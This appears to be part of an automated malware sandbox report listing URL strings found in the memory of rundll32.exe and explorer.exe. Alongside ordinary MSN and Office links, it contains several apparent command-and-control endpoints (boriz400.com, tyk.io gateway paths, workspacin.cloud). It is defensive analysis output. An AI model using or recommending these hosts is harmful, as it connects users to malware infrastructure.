                      Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/api/azurey
                      Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/content.php
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/qa
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: explorer.exe, 00000016.00000002.2945125604.000000000B4AE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://illoskanawer.com/live/
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/
                      Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure
                      Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php
                      Source: rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4
                      Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL
                      Source: rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF
                      Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/
                      Source: rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/5/
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/F
                      Source: rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure
                      Source: rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(
                      Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure/j
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azureY
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurej
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php
                      Source: rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j
                      Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep://www.
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j
                      Source: rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php(
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/
                      Source: explorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/0vaH
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/6
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/J5
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
